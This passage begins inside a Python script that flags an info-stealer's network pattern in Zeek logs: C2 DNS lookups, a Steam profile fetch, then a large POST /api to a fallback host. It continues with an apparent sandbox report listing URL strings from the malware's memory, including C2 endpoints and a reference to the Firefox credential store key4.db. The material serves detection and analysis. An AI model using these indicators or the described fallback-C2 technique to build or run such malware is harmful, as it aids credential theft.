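    return any(name == d or name.endswith("." + d) for d in c2)


def analyze(log_lines: list[str], c2: set[str]) -> dict[str, dict]:
    """Per-source-host findings for the three stages seen in the report:
    1. DNS lookups of configured C2 domains,
    2. a steamcommunity.com profile GET,
    3. POST /api to a host that is NOT in the config shortly after stage 2.
    Hosts showing fewer than two stages are dropped (a lone Steam profile view is normal).
    """
    per_host: dict[str, dict] = defaultdict(lambda: {
        "c2_dns": [], "steam_lookup_ts": None, "fallback_c2": set(), "bytes_posted": 0,
    })
    for line in log_lines:
        rec = json.loads(line)
        src, ts = rec["id.orig_h"], float(rec["ts"])
        h = per_host[src]
        if "query" in rec:  # dns.log record
            if domain_hit(rec["query"], c2):
                h["c2_dns"].append(rec["query"].lower())
            continue
        method = rec.get("method")  # http.log record
        host = rec.get("host", "").lower()
        uri = rec.get("uri", "")
        if method == "GET" and host == "steamcommunity.com" and STEAM_PROFILE_RE.match(uri):
            h["steam_lookup_ts"] = ts
        elif method == "POST" and uri == "/api" and not domain_hit(host, c2):
            t0 = h["steam_lookup_ts"]
            if t0 is not None and 0 <= ts - t0 <= WINDOW_SECONDS:
                h["fallback_c2"].add(host)
                h["bytes_posted"] += int(rec.get("request_body_len", 0))

    findings: dict[str, dict] = {}
    for src, h in per_host.items():
        stages = (int(bool(h["c2_dns"])) + int(h["steam_lookup_ts"] is not None)
                  + int(bool(h["fallback_c2"])))
        if stages >= 2:
            h["fallback_c2"] = sorted(h["fallback_c2"])
            h["stages"] = stages
            findings[src] = h
    return findings


# Constructed log lines mirroring the report's timeline (2024-10-20 06:38:59 UTC onward).
SAMPLE_LOGS = [
    *(f'{{"ts": 1729406339.6, "id.orig_h": "192.168.2.4", "query": "{d}"}}' for d in (
        "clearancek.site", "mobbipenju.store", "eaglepawnoy.store", "dissapoiznw.store",
        "studennotediw.store", "bathdoomgaz.store", "spirittunek.store", "licendfilteo.site")),
    '{"ts": 1729406340.1, "id.orig_h": "192.168.2.4", "query": "steamcommunity.com"}',
    '{"ts": 1729406341.7, "id.orig_h": "192.168.2.4", "method": "GET", "host": "steamcommunity.com", '
    '"uri": "/profiles/76561199724331900", "request_body_len": 0}',
    '{"ts": 1729406342.7, "id.orig_h": "192.168.2.4", "method": "POST", "host": "sergei-esenin.com", '
    '"uri": "/api", "request_body_len": 8}',
    '{"ts": 1729406344.3, "id.orig_h": "192.168.2.4", "method": "POST", "host": "sergei-esenin.com", '
    '"uri": "/api", "request_body_len": 52}',
    '{"ts": 1729406347.9, "id.orig_h": "192.168.2.4", "method": "POST", "host": "sergei-esenin.com", '
    '"uri": "/api", "request_body_len": 586556}',
    # Benign neighbour: views a Steam profile (fictitious ID) and does nothing else.
    '{"ts": 1729406350.0, "id.orig_h": "192.168.2.7", "method": "GET", "host": "steamcommunity.com", '
    '"uri": "/profiles/76561198000000001", "request_body_len": 0}',
]

if __name__ == "__main__":
    print(json.dumps(analyze(SAMPLE_LOGS, load_c2_domains(CONFIG_JSON)), indent=2))
```

Run it directly to print the findings for the constructed logs as JSON. Requiring at least two of the three stages keeps a lone Steam profile view from alerting; on real traffic the POST /api stage with a body of several hundred kilobytes, like the 586556-byte request above, is the strongest single signal, and the configured domains can be fed straight into DNS blocklists since the sample resolves every one of them in a burst.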
Source: file.exe, 00000000.00000003.1690793016.0000000001295000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://127.0.0.1:27060
Source: file.exe, 00000000.00000003.1752865199.0000000005CDD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: file.exe, 00000000.00000003.1752865199.0000000005CDD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: file.exe, 00000000.00000003.1752865199.0000000005CDD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: file.exe, 00000000.00000003.1752865199.0000000005CDD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: file.exe, 00000000.00000003.1752865199.0000000005CDD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: file.exe, 00000000.00000003.1752865199.0000000005CDD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: file.exe, 00000000.00000003.1752865199.0000000005CDD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: file.exe, 00000000.00000003.1752865199.0000000005CDD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
Source: file.exe, 00000000.00000003.1752865199.0000000005CDD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: file.exe, 00000000.00000003.1700607333.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: file.exe, 00000000.00000003.1752865199.0000000005CDD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.c.lencr.org/0
            Source: file.exe, 00000000.00000003.1752865199.0000000005CDD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
            Source: file.exe, 00000000.00000003.1719446245.0000000005BF7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1719628135.0000000005BF9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1719330275.0000000005C0F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: file.exe, 00000000.00000003.1700772120.0000000001283000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/
            Source: file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a61
            Source: file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
            Source: file.exe, 00000000.00000002.1852469176.000000000124F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1850629516.000000000124F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690568055.000000000124F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700659896.000000000124F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bathdoomgaz.store:443/apibcryptPrimitives.dll(
            Source: file.exe, 00000000.00000003.1690793016.0000000001295000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://broadcast.st.dl.eccdnx.com
            Source: file.exe, 00000000.00000003.1719446245.0000000005BF7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1719628135.0000000005BF9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1719330275.0000000005C0F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: file.exe, 00000000.00000003.1690697919.000000000128B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/
            Source: file.exe, 00000000.00000003.1719446245.0000000005BF7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1719628135.0000000005BF9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1719330275.0000000005C0F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: file.exe, 00000000.00000003.1719446245.0000000005BF7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1719628135.0000000005BF9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1719330275.0000000005C0F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: file.exe, 00000000.00000003.1700772120.0000000001283000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/
            Source: file.exe, file.exe, 00000000.00000003.1690568055.0000000001263000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1852469176.0000000001263000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1850629516.0000000001263000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700772120.0000000001265000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690697919.0000000001265000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700659896.0000000001263000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clearancek.site/api
            Source: file.exe, 00000000.00000003.1690568055.000000000124F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700659896.000000000124F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clearancek.site:443/api
            Source: file.exe, 00000000.00000003.1700772120.0000000001283000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.steamstatic.com/
            Source: file.exe, 00000000.00000003.1690568055.0000000001248000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700607333.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.steamstatic.com/public/css/applications/community/main.css?v=DVae4t4RZiHA&l=en
            Source: file.exe, 00000000.00000003.1700607333.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.steamstatic.com/public/css/globalv2.css?v=dQy8Omh4p9PH&l=english
            Source: file.exe, 00000000.00000003.1700607333.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.steamstatic.com/public/css/promo/summer2017/stickers.css?v=P8gOPraCSjV6&l=engl
            Source: file.exe, 00000000.00000003.1700607333.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.steamstatic.com/public/css/skin_1/header.css?v=pTvrRy1pm52p&l=english
            Source: file.exe, 00000000.00000003.1700607333.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1
            Source: file.exe, 00000000.00000003.1700607333.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.steamstatic.com/public/css/skin_1/profilev2.css?v=t9xiI4DlPpEB&l=english
            Source: file.exe, 00000000.00000003.1690568055.0000000001248000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700607333.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
            Source: file.exe, 00000000.00000003.1690568055.0000000001248000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700607333.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.steamstatic.com/public/javascript/applications/community/libraries~b28b7af69.js?v=
            Source: file.exe, 00000000.00000003.1690568055.0000000001248000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700607333.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.steamstatic.com/public/javascript/applications/community/main.js?v=4XouecKy8sZy&am
            Source: file.exe, 00000000.00000003.1690568055.0000000001248000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700607333.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.steamstatic.com/public/javascript/applications/community/manifest.js?v=r7a4-LYcQOj
            Source: file.exe, 00000000.00000003.1700607333.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.steamstatic.com/public/javascript/global.js?v=7qlUmHSJhPRN&l=english
            Source: file.exe, 00000000.00000003.1700607333.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
            Source: file.exe, 00000000.00000003.1700607333.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.steamstatic.com/public/javascript/modalContent.js?v=XpCpvP7feUoO&l=english
            Source: file.exe, 00000000.00000003.1700607333.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
            Source: file.exe, 00000000.00000003.1700607333.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.steamstatic.com/public/javascript/profile.js?v=bbs9uq0gqJ-H&l=english
            Source: file.exe, 00000000.00000003.1700607333.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.steamstatic.com/public/javascript/promo/stickers.js?v=W8NP8aTVqtms&l=english
            Source: file.exe, 00000000.00000003.1700607333.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
            Source: file.exe, 00000000.00000003.1700607333.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=english
            Source: file.exe, 00000000.00000003.1700607333.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL&l=
            Source: file.exe, 00000000.00000003.1700607333.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.steamstatic.com/public/javascript/webui/clientcom.js?v=jq1jQyX1843y&l=english
            Source: file.exe, 00000000.00000003.1700607333.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.steamstatic.com/public/shared/css/buttons.css?v=-WV9f1LdxEjq&l=english
            Source: file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.steamstatic.com/public/shared/css/motiva_sans.css?v=v7XTmVzbLV33&l=english
            Source: file.exe, 00000000.00000003.1700607333.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.steamstatic.com/public/shared/css/shared_global.css?v=uF6G1wyNU-4c&l=english
            Source: file.exe, 00000000.00000003.1700607333.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.steamstatic.com/public/shared/css/shared_responsive.css?v=kR9MtmbWSZEp&l=engli
            Source: file.exe, 00000000.00000003.1700607333.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
            Source: file.exe, 00000000.00000003.1700607333.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.steamstatic.com/public/shared/images/responsive/header_logo.png
            Source: file.exe, 00000000.00000003.1700607333.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
            Source: file.exe, 00000000.00000003.1700607333.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
            Source: file.exe, 00000000.00000003.1700607333.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&l=engl
            Source: file.exe, 00000000.00000003.1700607333.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.steamstatic.com/public/shared/javascript/shared_global.js?v=7glT1n_nkVCs&l=eng
            Source: file.exe, 00000000.00000003.1700607333.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSvIAKtunf
            Source: file.exe, 00000000.00000003.1700607333.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
            Source: file.exe, 00000000.00000002.1852469176.0000000001281000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1850629516.0000000001271000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700772120.0000000001283000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cosergei-esenin.comsergei-esenin.comty/public/assets/
            Source: file.exe, 00000000.00000002.1852469176.000000000124F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1850629516.000000000124F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690568055.000000000124F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700659896.000000000124F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dissapoiznw.store:443/api
            Source: file.exe, 00000000.00000003.1719446245.0000000005BF7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1719330275.0000000005C0F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: file.exe, 00000000.00000003.1719446245.0000000005BF7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1719330275.0000000005C0F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: file.exe, 00000000.00000003.1719446245.0000000005BF7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1719330275.0000000005C0F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: file.exe, 00000000.00000003.1700772120.0000000001283000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
            Source: file.exe, 00000000.00000003.1700607333.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
            Source: file.exe, 00000000.00000003.1690568055.000000000124F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700659896.000000000124F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://licendfilteo.site:443/api
            Source: file.exe, 00000000.00000003.1700772120.0000000001283000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
            Source: file.exe, 00000000.00000003.1690793016.0000000001295000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
            Source: file.exe, 00000000.00000003.1690793016.0000000001295000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
            Source: file.exe, 00000000.00000003.1690568055.000000000124F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700659896.000000000124F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mobbipenju.store:443/api
            Source: file.exe, 00000000.00000003.1690793016.0000000001295000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
            Source: file.exe, 00000000.00000003.1700772120.0000000001283000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
            Source: file.exe, 00000000.00000003.1690793016.0000000001295000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
            Source: file.exe, 00000000.00000003.1700772120.0000000001283000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
            Source: file.exe, file.exe, 00000000.00000003.1850629516.00000000012DF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700772120.000000000128B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1851091044.00000000012DF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1853087164.00000000012DF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700849717.0000000001295000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com/
            Source: file.exe, 00000000.00000003.1850629516.00000000012DF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1851091044.00000000012DF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1853087164.00000000012DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com/BK
            Source: file.exe, 00000000.00000003.1700849717.0000000001295000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com/api
            Source: file.exe, 00000000.00000002.1857604053.0000000005BD2000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1851374834.0000000005BD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com/api(
            Source: file.exe, 00000000.00000003.1700659896.0000000001248000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com/apiHv$
            Source: file.exe, 00000000.00000003.1851345687.0000000005BDD000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1858209085.0000000005BDD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com/apieP
            Source: file.exe, 00000000.00000003.1851345687.0000000005BDD000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1858209085.0000000005BDD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com/apiwz
            Source: file.exe, 00000000.00000003.1850629516.00000000012DF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1851091044.00000000012DF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1853087164.00000000012DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com/k
            Source: file.exe, 00000000.00000003.1700772120.000000000128B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700849717.0000000001295000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com/za%
            Source: file.exe, 00000000.00000002.1852469176.000000000124F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1850629516.000000000124F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com:443/api
            Source: file.exe, 00000000.00000002.1852469176.000000000124F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1850629516.000000000124F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com:443/api4p.default-release/key4.dbPK
            Source: file.exe, 00000000.00000002.1852469176.000000000124F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1850629516.000000000124F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com:443/api6
            Source: file.exe, 00000000.00000002.1852469176.000000000124F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1850629516.000000000124F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com:443/apiK
            Source: file.exe, 00000000.00000003.1700659896.000000000124F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com:443/apih
